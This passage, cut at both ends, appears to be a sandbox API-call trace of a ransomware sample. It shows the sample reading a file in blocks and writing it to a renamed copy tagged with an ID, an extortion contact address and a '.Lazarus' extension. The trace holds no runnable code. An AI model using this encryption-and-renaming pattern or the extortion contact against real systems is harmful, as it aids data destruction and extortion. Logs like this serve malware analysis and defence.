hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0075.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0075.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.893] AreFileApisANSI () returned 1 [0075.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico", lpUsedDefaultChar=0x0) returned 41 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0075.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0075.894] AreFileApisANSI () returned 1 [0075.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0075.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x66f40 [0075.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0075.894] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.894] GetFileType (hFile=0x410) returned 0x1 [0075.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0075.894] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0075.894] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0075.894] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0075.895] CloseHandle (hObject=0x410) returned 1 [0075.895] AreFileApisANSI () returned 1 [0075.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0075.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0075.895] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.895] GetFileType (hFile=0x410) returned 0x1 [0075.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.895] CloseHandle (hObject=0x410) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0075.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0075.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.896] AreFileApisANSI () returned 1 [0075.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0075.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x66f40 [0075.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0075.896] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66)) returned 1 [0075.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0075.896] AreFileApisANSI () returned 1 [0075.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.897] GetLastError () returned 0x0 [0075.897] SetLastError (dwErrCode=0x0) [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0d8 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0075.897] GetLastError () returned 0x0 [0075.897] SetLastError (dwErrCode=0x0) [0075.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0075.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0075.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0075.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0075.897] AreFileApisANSI () returned 1 [0075.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0075.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xce) returned 0x73428 [0075.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x73428, cchWideChar=103 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 103 [0075.898] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.898] GetFileType (hFile=0x410) returned 0x1 [0075.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73428 | out: hHeap=0x20000) returned 1 [0075.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0075.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0075.898] AreFileApisANSI () returned 1 [0075.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0075.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67a20 [0075.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0075.899] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.899] GetFileType (hFile=0x42c) returned 0x1 [0075.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0075.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0075.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.899] GetLastError () returned 0x0 [0075.899] SetLastError (dwErrCode=0x0) [0075.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.899] GetLastError () returned 0x0 [0075.899] SetLastError (dwErrCode=0x0) [0075.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.899] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0076.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0076.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0076.156] GetLastError () returned 0x0 [0076.156] SetLastError (dwErrCode=0x0) [0076.156] GetLastError () returned 0x0 [0076.156] SetLastError (dwErrCode=0x0) [0076.156] GetLastError () returned 0x0 [0076.156] SetLastError (dwErrCode=0x0) [0076.156] GetLastError () returned 0x0 [0076.156] SetLastError (dwErrCode=0x0) [0076.156] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.157] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.158] GetLastError () returned 0x0 [0076.158] SetLastError (dwErrCode=0x0) [0076.158] GetLastError () returned 0x0 [0076.158] SetLastError (dwErrCode=0x0) [0076.158] GetLastError () returned 0x0 [0076.158] SetLastError (dwErrCode=0x0) [0076.158] GetLastError () returned 0x0 [0076.158] SetLastError (dwErrCode=0x0) [0076.158] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.158] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.159] GetLastError () returned 0x0 [0076.159] SetLastError (dwErrCode=0x0) [0076.159] GetLastError () returned 0x0 [0076.159] SetLastError (dwErrCode=0x0) [0076.159] GetLastError () returned 0x0 [0076.159] SetLastError (dwErrCode=0x0) [0076.159] GetLastError () returned 0x0 [0076.159] SetLastError (dwErrCode=0x0) [0076.159] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.159] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.159] GetLastError () returned 0x0 [0076.159] SetLastError (dwErrCode=0x0) [0076.160] GetLastError () returned 0x0 [0076.160] SetLastError (dwErrCode=0x0) [0076.160] GetLastError () returned 0x0 [0076.160] SetLastError (dwErrCode=0x0) [0076.160] GetLastError () returned 0x0 [0076.160] SetLastError (dwErrCode=0x0) [0076.160] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.160] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.160] GetLastError () returned 0x0 [0076.160] SetLastError (dwErrCode=0x0) [0076.160] GetLastError () returned 0x0 [0076.160] SetLastError (dwErrCode=0x0) [0076.161] GetLastError () returned 0x0 [0076.161] SetLastError (dwErrCode=0x0) [0076.161] GetLastError () returned 0x0 [0076.161] SetLastError (dwErrCode=0x0) [0076.161] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.161] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.161] GetLastError () returned 0x0 [0076.161] SetLastError (dwErrCode=0x0) [0076.161] GetLastError () returned 0x0 [0076.161] SetLastError (dwErrCode=0x0) [0076.161] GetLastError () returned 0x0 [0076.161] SetLastError (dwErrCode=0x0) [0076.162] GetLastError () returned 0x0 [0076.162] SetLastError (dwErrCode=0x0) [0076.162] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.162] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.162] GetLastError () returned 0x0 [0076.162] SetLastError (dwErrCode=0x0) [0076.162] GetLastError () returned 0x0 [0076.162] SetLastError (dwErrCode=0x0) [0076.162] GetLastError () returned 0x0 [0076.162] SetLastError (dwErrCode=0x0) [0076.162] GetLastError () returned 0x0 [0076.162] SetLastError (dwErrCode=0x0) [0076.162] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.163] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.163] GetLastError () returned 0x0 [0076.163] SetLastError (dwErrCode=0x0) [0076.163] GetLastError () returned 0x0 [0076.163] SetLastError (dwErrCode=0x0) [0076.163] GetLastError () returned 0x0 [0076.163] SetLastError (dwErrCode=0x0) [0076.163] GetLastError () returned 0x0 [0076.163] SetLastError (dwErrCode=0x0) [0076.163] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0xf66, lpOverlapped=0x0) returned 1 [0076.163] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.164] GetLastError () returned 0x0 [0076.164] SetLastError (dwErrCode=0x0) [0076.164] GetLastError () returned 0x0 [0076.164] SetLastError (dwErrCode=0x0) [0076.164] GetLastError () returned 0x0 [0076.164] SetLastError (dwErrCode=0x0) [0076.164] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0076.164] GetLastError () returned 0x0 [0076.164] SetLastError (dwErrCode=0x0) [0076.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfa0 [0076.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0076.164] GetLastError () returned 0x0 [0076.164] SetLastError (dwErrCode=0x0) [0076.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0076.165] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0xf70, lpOverlapped=0x0) returned 1 [0076.165] GetLastError () returned 0x0 [0076.165] SetLastError (dwErrCode=0x0) [0076.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0076.165] GetLastError () returned 0x0 [0076.165] SetLastError (dwErrCode=0x0) [0076.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0076.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0076.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0076.165] HeapFree (in: hHeap=0x20000, 